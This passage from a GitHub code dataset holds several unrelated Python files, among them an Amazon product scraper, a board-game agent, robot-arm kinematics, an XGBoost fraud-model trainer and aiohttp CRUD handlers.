new_webpage = requests.get(\"https://www.amazon.com\" + link, headers=HEADERS)\n\n new_soup = BeautifulSoup(new_webpage.content, \"lxml\")\n\t\t\n\t\t# Function calls to display all necessary product information\n print(\"Product Title =\", get_title(new_soup))\n print(\"Product Price =\", get_price(new_soup))\n print(\"Product Rating =\", get_rating(new_soup))\n print(\"Number of Product Reviews =\", get_review_count(new_soup))\n print(\"Availability =\", get_availability(new_soup))\n print()\n print()\n\t \"\"\"","repo_name":"chase-geyer/roommate-app","sub_path":"scraping_data.py","file_name":"scraping_data.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9455807055","text":"import sys\n\ndef filter_replace(x):\n f=open('/users/yufangxian/Documents/exercise/filter.txt','r')\n words=f.read()\n wordlist=words.split()\n #print(words)\n for word in wordlist:\n if word in x:\n x=x.replace(word,'**')\n print(x)\n\n\n\n\n\nif __name__=='__main__':\n while True:\n x=input('please input:')\n filter_replace(x)\n","repo_name":"fangxian/python","sub_path":"exercises/exercise12.py","file_name":"exercise12.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"39075190061","text":"# Student agent: Add your own agent here\nimport math\nfrom copy import deepcopy\n\nimport numpy as np\n\nfrom agents.agent import Agent\nfrom store import register_agent\nimport sys\n\n\n@register_agent(\"student_agent\")\nclass StudentAgent(Agent):\n \"\"\"\n A dummy class for your implementation. Feel free to use this class to\n add any helper functionalities needed for your agent.\n \"\"\"\n\n def __init__(self):\n super(StudentAgent, self).__init__()\n self.name = \"StudentAgent\"\n self.dir_map = {\n \"u\": 0,\n \"r\": 1,\n \"d\": 2,\n \"l\": 3,\n }\n self.moves = ((-1, 0), (0, 1), (1, 0), (0, -1))\n self.opposites = {0: 2, 1: 3, 2: 0, 3: 1}\n\n self.autoplay = True\n\n def check_valid_step(self, start_pos1, end_pos1, adv_pos1, chess_board, max_step):\n \"\"\"\n Check if the step the agent takes is valid (reachable and within max steps).\n\n Parameters\n ----------\n start_pos : tuple\n The start position of the agent.\n end_pos : np.ndarray\n The end position of the agent.\n barrier_dir : int\n The direction of the barrier.\n \"\"\"\n # checks if shortest distance is reachable\n # does not check whether the path is reachable when factoring in borders\n x_diff = abs(start_pos1[0] - end_pos1[0])\n y_diff = abs(start_pos1[1] - end_pos1[1])\n if (x_diff + y_diff > max_step):\n return False\n start_pos = np.asarray(start_pos1)\n end_pos = np.asarray(end_pos1)\n adv_pos = np.asarray(adv_pos1)\n if np.array_equal(start_pos, end_pos):\n return True\n\n #check if path is actually reachable\n state_queue = [(start_pos, 0)]\n visited = {tuple(start_pos)}\n is_reached = False\n while state_queue and not is_reached:\n cur_pos, cur_step = state_queue.pop(0)\n r, c = cur_pos\n if cur_step == max_step:\n break\n for dir, move in enumerate(self.moves):\n if chess_board[r, c, dir]:\n continue\n\n next_pos = cur_pos + move\n if np.array_equal(next_pos, adv_pos) or tuple(next_pos) in visited:\n continue\n if np.array_equal(next_pos, end_pos):\n is_reached = True\n break\n visited.add(tuple(next_pos))\n state_queue.append((next_pos, cur_step + 1))\n return is_reached\n\n def dist(self, c1, c2):\n x_dist = c1[0] - c2[0]\n y_dist = c1[1] 
- c2[1]\n return (x_dist, y_dist)\n\n def barrier_chooser(self, chess_board, end_pos, guess):\n if (not chess_board[end_pos[0], end_pos[1], guess]):\n return guess\n for i in range(4):\n if (not chess_board[end_pos[0], end_pos[1], i]):\n dir = i\n return dir\n\n\n def bsf2(self, chess_board, start_pos1, adv_pos1, list, final):\n start_pos = np.asarray(start_pos1)\n adv_pos = np.asarray(adv_pos1)\n # BFS\n if tuple(start_pos) in list:\n return tuple(start_pos), 0\n state_queue = [(start_pos, 0)]\n visited = {tuple(start_pos)}\n is_reached = False\n\n while state_queue and not is_reached:\n cur_pos, cur_step = state_queue.pop(0)\n r, c = cur_pos\n for dir, move in enumerate(self.moves):\n if chess_board[r, c, dir]:\n continue\n next_pos = cur_pos + move\n if np.array_equal(next_pos, adv_pos) or tuple(next_pos) in visited:\n continue\n if tuple(next_pos) in list and tuple(next_pos) not in final:\n is_reached = True\n break\n visited.add(tuple(next_pos))\n state_queue.append((next_pos, cur_step + 1))\n\n if tuple(next_pos) not in list:\n return False\n\n return tuple(next_pos), cur_step + 1\n\n def find_best_moves(self, chess_board, adv_pos):\n best_moves = []\n # finds the best tiles to move to\n if (not chess_board[adv_pos[0], adv_pos[1], 0]):\n best_moves.append((adv_pos[0] - 1, adv_pos[1]))\n if (not chess_board[adv_pos[0], adv_pos[1], 1]):\n best_moves.append((adv_pos[0], adv_pos[1] + 1))\n if (not chess_board[adv_pos[0], adv_pos[1], 2]):\n best_moves.append((adv_pos[0] + 1, adv_pos[1]))\n if (not chess_board[adv_pos[0], adv_pos[1], 3]):\n best_moves.append((adv_pos[0], adv_pos[1] - 1))\n return best_moves\n\n def get_valid_moves(self, chess_board, my_pos, adv_pos, max_step):\n poss_moves = []\n size = len(chess_board)\n # gets all tiles on the board that are reachable and adds to poss_moves\n for i in range(size):\n for j in range(size):\n coord = (i, j)\n if (self.check_valid_step(my_pos, coord, adv_pos, chess_board, max_step) and coord != adv_pos):\n poss_moves.append(coord)\n return poss_moves\n\n\n def pick_moves(self, chess_board, adv_pos, poss_moves, best_moves):\n #BFS\n min = 100\n final = []\n for move in best_moves:\n bfs = self.bsf2(chess_board, move, adv_pos, poss_moves, final)\n if bfs == False:\n continue\n else:\n if bfs[0] not in final:\n final.append(bfs[0])\n if (bfs[1] <= min):\n min = bfs[1]\n min_m = bfs[0]\n #if BFS fails -> Backup\n if final == []:\n for move in poss_moves:\n for move2 in best_moves:\n x_d = move[0] - move2[0]\n y_d = move[1] - move2[1]\n if (abs(x_d) + abs(y_d) <= min):\n min = abs(x_d) + abs(y_d)\n min_m = move\n final.append(move)\n return final, min_m\n\n def choose_dir(self, adv_pos, chess_board, final):\n dis = self.dist(final, adv_pos)\n if (abs(dis[0]) <= abs(dis[1])):\n if (dis[1] < 0 and not chess_board[final[0], final[1], 1]):\n dir = 1\n elif (dis[1] >= 0 and not chess_board[final[0], final[1], 3]):\n dir = 3\n else:\n if (dis[0] < 0):\n dir = self.barrier_chooser(chess_board, final, 2)\n else:\n dir = self.barrier_chooser(chess_board, final, 0)\n\n else:\n if (dis[0] < 0 and not chess_board[final[0], final[1], 2]):\n dir = 2\n elif (dis[0] >= 0 and not chess_board[final[0], final[1], 0]):\n dir = 0\n else:\n if (dis[1] < 0):\n dir = self.barrier_chooser(chess_board, final, 1)\n else:\n dir = self.barrier_chooser(chess_board, final, 3)\n return dir\n\n def set_barrier(self, r, c, dir, chess_board):\n # Set the barrier to True\n chess_board[r, c, dir] = True\n # Set the opposite barrier to True\n move = self.moves[dir]\n chess_board[r + 
move[0], c + move[1], self.opposites[dir]] = True\n\n def check_endgame(self, chess_board, player_pos, opponent_pos):\n board_size = int(math.sqrt(chess_board.size) / 2)\n\n # Union-Find\n father = dict()\n for r in range(board_size):\n for c in range(board_size):\n father[(r, c)] = (r, c)\n\n def find(pos):\n if father[pos] != pos:\n father[pos] = find(father[pos])\n return father[pos]\n\n def union(pos1, pos2):\n father[pos1] = pos2\n\n for r in range(board_size):\n for c in range(board_size):\n for dir, move in enumerate(\n self.moves[1:3]\n ): # Only check down and right\n if chess_board[r, c, dir + 1]:\n continue\n pos_a = find((r, c))\n pos_b = find((r + move[0], c + move[1]))\n if pos_a != pos_b:\n union(pos_a, pos_b)\n\n for r in range(board_size):\n for c in range(board_size):\n find((r, c))\n p0_r = find(player_pos)\n p1_r = find(opponent_pos)\n p0_score = list(father.values()).count(p0_r)\n p1_score = list(father.values()).count(p1_r)\n\n #print(\"Point Counting\")\n if p0_r == p1_r:\n return 0\n if p0_score > p1_score:\n return 1\n elif p0_score < p1_score:\n return -1\n else:\n return 0.5\n\n\n\n def minimax(self, chess_board, my_pos, adv_pos, poss_moves, max_step, depth=0):\n dict = {}\n lose = 0\n tie = 0\n for move in poss_moves:\n copy = deepcopy(chess_board)\n opp_utility = []\n self.set_barrier(move[0][0], move[0][1], move[1], copy)\n # we calculate the utility of our move by checking endgame and seeing if we won, lost or game still going\n utility = self.check_endgame(copy, move[0], adv_pos)\n # if utility is 1 then we win so we can break out and perform this move\n if utility == 1 and depth == 0:\n return move\n # if utility is -1 we lose so we eliminate this move as an option and continue\n if utility == -1 and depth == 0:\n lose = move\n if utility == 0.5 and depth == 0:\n tie = move\n # if utility is 0 the result is undetermined so we keep this move as an option and continue\n if utility == 0 and depth == 0:\n # we run the opponents move in response to each of our potential moves\n best_moves = self.find_best_moves(copy, move[0])\n poss_moves = self.get_valid_moves(copy, adv_pos, move[0], max_step)\n moves = self.pick_moves(copy, move[0], poss_moves, best_moves)\n final = self.generate_full_moves(copy, moves[0])\n # we calculate the opponents utility for all their possible moves and return min utility\n opp_utility = min(self.minimax(copy, adv_pos, move[0], final, max_step, 1))\n dict[move] = opp_utility*-1\n if depth == 1:\n opp_utility.append(utility)\n if depth == 1:\n return opp_utility\n if bool(dict):\n max_move = max(dict, key=dict.get)\n else:\n if tie != 0:\n return tie\n else:\n return lose\n if dict[max_move] == 0:\n m = [k for k, v in dict.items() if v == 0]\n return m\n return max_move\n\n\n # return the best move\n def generate_full_moves(self, chess_board, moves):\n final = []\n for move in moves:\n for i in range(4):\n r, c = move\n if not chess_board[r, c, i]:\n final.append((move, i))\n return final\n\n def step(self, chess_board, my_pos, adv_pos, max_step):\n \"\"\"\n Implement the step function of your agent here.\n You can use the following variables to access the chess board:\n - chess_board: a numpy array of shape (x_max, y_max, 4)\n - my_pos: a tuple of (x, y)\n - adv_pos: a tuple of (x, y)\n - max_step: an integer\n\n You should return a tuple of ((x, y), dir),\n where (x, y) is the next position of your agent and dir is the direction of the wall\n you want to put on.\n\n Please check the sample implementation in agents/random_agent.py or 
agents/human_agent.py for more details.\n \"\"\"\n\n # finds the tiles right next to the opponent that do not have a barrier\n best_moves = self.find_best_moves(chess_board, adv_pos)\n # gets all tiles on the board that are reachable and adds to poss_moves\n poss_moves = self.get_valid_moves(chess_board,my_pos, adv_pos, max_step)\n # finds move from poss_moves that is closest to the 'best tile'\n moves = self.pick_moves(chess_board,adv_pos,poss_moves,best_moves)\n\n final = self.generate_full_moves(chess_board, moves[0])\n\n result = self.minimax(chess_board,my_pos,adv_pos,final, max_step)\n dir = -1\n if type(result) == list:\n for move in result:\n if (moves[1] == move[0]):\n dir = self.choose_dir(adv_pos, chess_board, move[0])\n if dir != -1:\n return move[0], dir\n if dir == -1:\n return result[0][0], result[0][1]\n\n return result[0], result[1]\n","repo_name":"comp424mcgill/final-project-vishvak-mark","sub_path":"agents/student_agent.py","file_name":"student_agent.py","file_ext":"py","file_size_in_byte":12849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"16807630990","text":"import random\nfrom math import comb\nimport numpy as np\n\n\ndef p_k(p, n, k):\n # binomial pmf: use n rather than a hardcoded 3 so the helper works for any trial count\n return comb(n, k) * pow(p, k) * pow((1-p), (n-k))\n\nif __name__ == '__main__':\n k_max_for_coin_one = 2\n\n choices_of_coins = ['one', 'two']\n weight_p = [3, 1]\n # weight_p = [0.75, 0.25]\n\n choices = ['H', 'T']\n # coin_weights = {\n # 'one': [0.25, 0.75],\n # 'two': [0.75, 0.25]\n # }\n coin_weights = {\n 'one': [1, 3],\n 'two': [3, 1]\n }\n\n total_guesses = 1\n correct_guesses = 0.0\n for i in range(0, total_guesses):\n \n picked_coin = random.choices(choices_of_coins, weights=weight_p, k=1)[0]\n # picked_coin = np.random.choice(choices_of_coins, p=weight_p)\n\n # print(picked_coin)\n\n flip_results = random.choices(choices, weights=coin_weights[picked_coin], k=3)\n # flip_results = np.random.choice(choices, size=3, p=coin_weights[picked_coin])\n\n\n # print(flip_results)\n\n number_of_heads = len([f for f in flip_results if f == 'H'])\n\n # print(number_of_heads)\n\n guess = 'one' if number_of_heads <= k_max_for_coin_one else 'two'\n\n # print(guess)\n guess_correct = guess == picked_coin\n if guess_correct:\n correct_guesses = correct_guesses + 1\n\n # print(correct_guesses)\n \n print(\"correct/total\", correct_guesses/total_guesses)\n\n print(\"#####\")\n \n p = 0.25\n n = 3\n coin_one = p_k(p, n, 0) + p_k(p, n, 1) + p_k(p, n, 2)\n coin_two = p_k(1-p, n, 3)\n\n print(0.75*coin_one + 0.25*coin_two)\n ","repo_name":"melaoni/expense-tracking","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5885402473","text":"from rest_framework.status import HTTP_200_OK\nfrom rest_framework.utils import json\n\nfrom albums.serializers import PhotoSerializer, AlbumSerializer\n\n\ndef album_with_photos_template(album, photos, as_json=False):\n obj = {\n 'pk': album.pk,\n 'slug': album.slug,\n 'name': album.name,\n 'description': album.description,\n 'is_public': album.is_public,\n 'album_type': album.album_type,\n 'photos': list(PhotoSerializer(photos, many=True).data)\n }\n\n if as_json:\n return json.dumps(obj)\n return obj\n\n\ndef save_template(**kwargs):\n as_json = kwargs['as_json']\n status = kwargs['status']\n request = kwargs['request']\n result = kwargs['result']\n\n if status == HTTP_200_OK:\n message = 'Save successful'\n 
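# illustrative success payload (comment added for clarity): {'status': 200, 'message': 'Save successful', 'data': {...serialized album fields...}}\n 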
data = AlbumSerializer(result).data\n else:\n message = result\n data = request.data\n\n response = {\n 'status': status,\n 'message': message,\n 'data': data\n }\n\n if as_json:\n return json.dumps(response)\n return response\n","repo_name":"jorgec/project_linecare","sub_path":"albums/modules/response_templates/album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"5274207440","text":"import math\n\n\"\"\"\nuse SI units\nlength: m (meters)\nangle: rad (pi = 180°)\n\"\"\"\n# define scara arm\nL1 = 130/1000 # in m\nL2 = 130/1000 # in m\nalpha_min = math.radians( -90)\nalpha_max = math.radians( 90)\ngamma_min = math.radians( 45)\ngamma_max = math.radians( 180)\nx_offset = 0\ny_offset = 0\n\n# math helpers\nL1_2 = math.pow(L1, 2)\nL2_2 = math.pow(L2, 2)\nL1L2_2 = 2*L1*L2\n\n# ° to rad: math.radians()\n# rad to °: math.degrees()\ndef foreward_kinematics(alpha_in, gamma_in):\n #print(\"foreward_kinematics({a:.6f}, {g:.6f})\".format(a = math.degrees(alpha_in), g = math.degrees(gamma_in)))\n #sanity tests\n if alpha_in < alpha_min:\n return [False, 0, 0]\n if alpha_in > alpha_max:\n return [False, 0, 0]\n if gamma_in < gamma_min:\n return [False, 0, 0]\n if gamma_in > gamma_max:\n return [False, 0, 0]\n \n if gamma_in == 0:\n # basically OK: wherever alpha_in points, the length r_f == 0 -> so [0, 0]\n return [True, 0, 0]\n\n #scara to polar\n r_foreward_2 = L1_2 + L2_2 - 2*L1*L2*math.cos(gamma_in)\n r_foreward = math.sqrt(r_foreward_2)\n #print(\" rf: {r:.6f}, rf_2: {r2:.6f}\".format(r=r_foreward, r2=r_foreward_2))\n alpha = math.acos((L1_2 + r_foreward_2 - L2_2) / (2*L1*r_foreward))\n alpha_foreward = alpha_in - alpha\n #print(\" alpha: {a:.6f}, alpha_foreward: {a2:.6f}\".format(a=math.degrees(alpha), a2 = math.degrees(alpha_foreward)))\n #polar to kartesian\n xf = r_foreward * math.cos(alpha_foreward) + x_offset\n yf = r_foreward * math.sin(alpha_foreward) + y_offset\n return [True, xf, yf]\n\ndef inverse_kinematics(x_in, y_in):\n #print(\"inverse_kinematics({x:.6f}, {y:.6f})\".format(x = x_in, y = y_in))\n # kartesian to polar\n r_inverse_2 = math.pow(x_in - x_offset, 2) + math.pow(y_in - y_offset, 2)\n r_inverse = math.sqrt(r_inverse_2)\n if r_inverse > L1+L2:\n #error, out of reach\n return [False, 0, 0]\n alpha_inverse = math.atan2(y_in, x_in)\n # polar to scara\n gamma_out = math.acos((L1_2 + L2_2 - r_inverse_2) / L1L2_2 )\n if gamma_out < gamma_min:\n return [False, 0, 0]\n if gamma_out > gamma_max:\n return [False, 0, 0]\n alpha = math.acos((L1_2 + r_inverse_2 - L2_2) / (2*L1*r_inverse))\n #print(\" alpha: {a:.6f}, alpha_inverse: {ai:.6f}\".format(a=math.degrees(alpha), ai=math.degrees(alpha_inverse)))\n alpha_out = (alpha_inverse + alpha)\n if alpha_out < alpha_min:\n return [False, 0, 0]\n if alpha_out > alpha_max:\n return [False, 0, 0]\n return [True, alpha_out, gamma_out]\n","repo_name":"mwuerms/pyscara","sub_path":"scarakinematics.py","file_name":"scarakinematics.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74369925109","text":"\ndef cargar():\n\t\n\tdiccionario={}\n\tcontinua=\"s\"\n\twhile continua==\"s\":\n\t\tespa=input(\"Enter the Spanish word to store: \")\n\t\ting=input(\"Enter its English translation: \")\n\t\tdiccionario[espa]=ing\n\t\tcontinua=input(\"Do you want to add another word? [s/n]\")\n\treturn 
diccionario\n\ndef imprimir(diccionario):\n\t\n\tprint(\"Complete dictionary listing\")\n\tprint(\"********************************\")\n\tfor ingles in diccionario:\n\t\tprint(ingles, diccionario[ingles])\n\ndef consulta_palabra(diccionario):\n\t\n\tpal=input(\"Enter the Spanish word to look up: \")\n\tif pal in diccionario:\n\t\tprint(\"In English it means: \", diccionario[pal])\n\n\n# Main block\n\ndiccionario=cargar()\nimprimir(diccionario)\nprint(\"*****************************\")\nconsulta_palabra(diccionario)\n","repo_name":"jhovylimahuaya/Recordando-Python","sub_path":"2 - Ude/Inicio/estructuradeDatosTipoDiccionario.py","file_name":"estructuradeDatosTipoDiccionario.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17147498986","text":"import pandas as pd\nimport json\nimport os\nfrom joblib import dump\nfrom sklearn.model_selection import StratifiedKFold, cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nimport mlflow\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nimport time\nfrom xgboost import XGBClassifier, plot_importance\nimport matplotlib.pyplot as plt\n\n# Set MLflow tracking URI\nmlflow.set_tracking_uri(\"databricks\")\nmlflow.set_experiment(\"/Users/micolp20022@gmail.com/fraud-model\")\n\n# Set path to inputs\nPROCESSED_DATA_DIR = os.environ[\"PROCESSED_DATA_DIR\"]\ntrain_data_file = 'train.csv'\ntrain_data_path = os.path.join(PROCESSED_DATA_DIR, train_data_file)\n\n# Read data\ntransactions_data = pd.read_csv(train_data_path)\n# Split data into dependent and independent variables\n# X_train_ = transactions_data.drop('fraud', axis=1)\n# df_cleaned = X_train.dropna()\n# df_drop = df_cleaned.drop(columns = ['source','target','device','zipcodeOri','zipMerchant'])\n# category_columns = df_drop.select_dtypes(include=['object']).columns\n# df_encoded = pd.get_dummies(df_drop, columns=category_columns)\n# C = 2*np.pi/12\n# C_ = 2*np.pi/24\n# # Map month to the unit circle.\n# df_encoded[\"month_sin\"] = np.sin(df_encoded['month']*C)\n# df_encoded[\"month_cos\"] = np.cos(df_encoded['month']*C)\n# df_encoded.timestamp = df_encoded.timestamp.values.astype(np.int64) // 10 ** 6\n# df_encoded['hour_sin']=np.sin(df_encoded['hour']*C)\n# df_encoded['hour_cos']=np.cos(df_encoded['hour']*C)\n# df = df_encoded.drop(columns = ['month', 'hour'])\n\n\nscaler = StandardScaler()\n\ny_train = transactions_data['fraud']\nX_train = scaler.fit_transform(transactions_data.drop('fraud', axis=1))\n# Model \n# Specify XGBoost parameters\nxgb_params = {\n 'max_depth': 4,\n 'learning_rate': 0.1,\n 'n_estimators': 100,\n 'subsample': 0.7,\n 'colsample_bytree': 0.8,\n 'objective': 'binary:logistic',\n 'eval_metric': 'logloss'\n}\n\n# Model \nxgb_model = XGBClassifier(**xgb_params)\nxgb_model = xgb_model.fit(X_train, y_train)\n\n# Plot and save feature importance plot\nplt.figure(figsize=(10, 6))\nplot_importance(xgb_model, importance_type='weight')\nfeature_importance_plot_path = \"feature_importance_plot.png\"\nplt.savefig(feature_importance_plot_path)\n# Cross validation\ncv = StratifiedKFold(n_splits=3) \nval_logit = cross_val_score(xgb_model, X_train, y_train, cv=cv).mean()\nval_f1 = cross_val_score(xgb_model, X_train, y_train, cv=cv, scoring = 'f1').mean()\n\n# Validation accuracy to JSON\ntrain_metadata = {\n 'validation_acc': val_logit,\n 'validation_f1':val_f1\n}\n\n# Start an MLflow run\nwith mlflow.start_run():\n\n # Log 
parameters\n mlflow.log_param(\"max_iter\", 10)\n mlflow.log_params(xgb_params)\n\n # Log the model\n # Log the model with a timestamp in the model name\n timestamp = time.strftime(\"%Y%m%d_%H%M%S\") # Generate timestamp\n model_name_with_timestamp = f\"Xgboost_model_{timestamp}.joblib\"\n mlflow.sklearn.log_model(xgb_model, model_name_with_timestamp)\n\n # Log validation accuracy\n mlflow.log_metric(\"validation_acc\", val_logit)\n mlflow.log_metric(\"f1_score\", val_f1)\n\n # Log metadata\n mlflow.log_params(train_metadata)\n mlflow.log_artifact(feature_importance_plot_path)\n\n# Set path to output (model)\nMODEL_DIR = os.environ[\"MODEL_DIR\"]\nmodel_name = 'xgboost.joblib'\nmodel_path = os.path.join(MODEL_DIR, model_name)\n\n# Serialize and save model\ndump(xgb_model, model_path)\n\n# Set path to output (metadata)\nRESULTS_DIR = os.environ[\"RESULTS_DIR\"]\ntrain_results_file = 'train_metadata.json'\nresults_path = os.path.join(RESULTS_DIR, train_results_file)\n\n# Serialize and save metadata\nwith open(results_path, 'w') as outfile:\n json.dump(train_metadata, outfile)\n\n","repo_name":"khanhvovan2002/mlops-fraud-transactions","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71669400308","text":"from pyrogram import Client, filters\nfrom YukkiMusic.misc import SUDO_USERS as SUDOERS\nfrom YukkiMusic.core.userbot import assistants\nfrom YukkiMusic.utils.database import get_client\n\nif 1 in assistants:\n ASS1 = userbot.one\n\nif 2 in assistants:\n ASS2 = userbot.two\n\n@Client.on_message(\n filters.private\n & filters.incoming\n & ~filters.service\n & ~filters.edited\n & ~filters.me\n & ~filters.bot\n & ~filters.via_bot)\nasync def assistant_(client, message):\n await client.send_message(chat_id=message.from_user.id,text=\"test\")\n","repo_name":"AerodynamicV1Botz/AeroVC_Player","sub_path":"YukkiMusic/plugins/techzbots/assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"94"} +{"seq_id":"74259256630","text":"'''\nThis module gives some special admin functionality.\n'''\nfrom config import *\n\ntemp_id = dict()\n\n@bot.message_handler(commands=['admin'])\ndef reply_admin_commands_list(message):\n 'Replies admin_commands dict'\n cid = get_user_id(message)\n\n if cid in admin_users:\n help_text = 'The following commands are available:\\n'\n cmd_list = sorted(list(admin_commands.keys()))\n for key in cmd_list:\n help_text += '/' + str(key) + ': ' + str(admin_commands[key]) + '\\n'\n bot.send_message(cid, help_text)\n\n@bot.message_handler(commands=['addadmin'])\ndef reply_add_admin_cmd(message):\n 'adds an admin'\n cid = get_user_id(message)\n \n if cid in admin_users:\n id_to_add = message.text[10:]\n \n if id_to_add == '':\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the new admin\\'s ID?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, add_admin_step_id)\n\n elif id_to_add.isdigit() == False:\n bot.reply_to(message, 'Ex. 
/addadmin 1234567')\n return\n\n elif id_to_add.isdigit():\n temp_id[cid] = int(id_to_add)\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the new admin\\'s name?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, add_admin_step_name)\n\ndef add_admin_step_id(message):\n cid = get_user_id(message)\n\n id_to_add = message.text\n if id_to_add == '/cancel':\n return\n \n elif id_to_add.isdigit():\n temp_id[cid] = int(id_to_add)\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the new admin\\'s name?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, add_admin_step_name)\n\ndef add_admin_step_name(message):\n cid = get_user_id(message)\n \n new_name = message.text\n if new_name == '/cancel':\n return\n \n else:\n markup = types.ReplyKeyboardHide(selective=True)\n add_key_dict(admin_users_file, admin_users, temp_id[cid], new_name)\n bot.reply_to(message, 'New admin!ヽ(*⌒∇⌒*)ノ\\n', reply_markup=markup)\n\nadmin_commands['addadmin'] = 'Adds admin by ID.'\n\n@bot.message_handler(commands=['deladmin'])\ndef reply_del_admin_cmd(message):\n 'Deletes an admin'\n cid = get_user_id(message)\n \n if cid in admin_users:\n msg = message.text[10:]\n if msg == '':\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the admin\\'s ID?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, del_admin_step_id)\n \n elif msg.isdigit() == False:\n bot.reply_to(message, 'Ex. /deladmin 1234567')\n return\n \n elif msg.isdigit() and int(msg) in admin_users:\n bot.reply_to(message, 'Bye-bye admin!(´∩`。)\\n' + str(msg) + ' ' + admin_users[int(msg)])\n remove_key_dict(admin_users_file, admin_users, int(msg))\n\ndef del_admin_step_id(message):\n cid = get_user_id(message)\n id_to_del = message.text\n \n if id_to_del == '/cancel':\n return\n \n elif id_to_del.isdigit() and int(id_to_del) in admin_users:\n bot.reply_to(message, 'Bye-bye admin!(´∩`。)\\n' + str(id_to_del) + ' ' + admin_users[int(id_to_del)])\n remove_key_dict(admin_users_file, admin_users, int(id_to_del))\n\nadmin_commands['deladmin'] = 'Deletes admin by ID.'\n\n@bot.message_handler(commands=['admins'])\ndef reply_admin_user_list(message):\n 'Replies admin list'\n cid = get_user_id(message)\n \n if cid in admin_users:\n reply_text = 'My admins (/^▽^)/\\n'\n reply_text += '==================\\n'\n for key in admin_users:\n reply_text += '[' + str(key) + ']: ' + str(admin_users[key]) + '\\n'\n reply_text += '=================='\n bot.reply_to(message, reply_text)\n\t\nadmin_commands['admins'] = 'List of all admins.'\n","repo_name":"CarlitoBriganteNT/parklezbot","sub_path":"plugins/admin_module.py","file_name":"admin_module.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29177778857","text":"import sqlalchemy as sa\nfrom aiohttp import web\nfrom aiojobs.aiohttp import atomic\n\nfrom service.data_classes.project import *\nfrom service.database.tables import project\nfrom service.database.connector import AsyncpgsaStorage\n\n\n@atomic\nasync def create(\n request: web.Request,\n data: RequestProjectCreate = None,\n) -> ResponseProject:\n \"\"\"Create Project.\"\"\"\n\n data: RequestProjectCreate = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n values = 
data.params.dict()\n\n query = project.insert().values(**values).returning(sa.literal_column(\"*\"))\n result = await storage.fetchrow(query)\n\n response = ResponseProject(result=result)\n\n return response\n\n\nasync def read(\n request: web.Request, data: RequestProjectRead = None\n) -> ResponseProjectSeveral:\n \"\"\"Read Project.\"\"\"\n\n data: RequestProjectRead = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n query = project.select().where(project.c.id.in_(data.params))\n\n result = await storage.fetch(query)\n response = ResponseProjectSeveral(result=result)\n\n return response\n\n\n@atomic\nasync def update(\n request: web.Request,\n data: RequestProjectUpdate = None,\n) -> ResponseProject:\n \"\"\"Update Project.\"\"\"\n\n data: RequestProjectUpdate = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n values = data.params.dict()\n values.pop(\"id\")\n\n query = (\n project.update()\n .where(project.c.id == data.params.id)\n .values(**values)\n .returning(sa.literal_column(\"*\"))\n )\n\n result = await storage.fetchrow(query)\n response = ResponseProject(result=result)\n\n return response\n\n\n@atomic\nasync def delete(\n request: web.Request, data: RequestProjectDelete = None\n) -> ResponseSuccess:\n \"\"\"Delete Project.\"\"\"\n\n data: RequestProjectDelete = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n query = project.delete().where(project.c.id.in_(data.params))\n\n await storage.fetch(query)\n\n response = ResponseSuccess()\n\n return response\n\n\nasync def lst(\n request: web.Request, data: RequestProjectList = None\n) -> ResponseProjectSeveral:\n \"\"\"List of Projects.\"\"\"\n\n data: RequestProjectList = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n params = data.dict(exclude_unset=True)[\"params\"]\n\n query = project.select()\n\n # Time\n if \"created_gt\" in params:\n query = query.where(\n project.c.created > params[\"created_gt\"].replace(tzinfo=None)\n )\n\n if \"created_lt\" in params:\n query = query.where(\n project.c.created < params[\"created_lt\"].replace(tzinfo=None)\n )\n\n if \"updated_gt\" in params:\n query = query.where(\n project.c.updated > params[\"updated_gt\"].replace(tzinfo=None)\n )\n\n if \"updated_lt\" in params:\n query = query.where(\n project.c.updated < params[\"updated_lt\"].replace(tzinfo=None)\n )\n\n query = query.order_by(project.c.created.desc())\n\n result = await storage.fetch(query)\n response = ResponseProjectSeveral(result=result)\n\n return 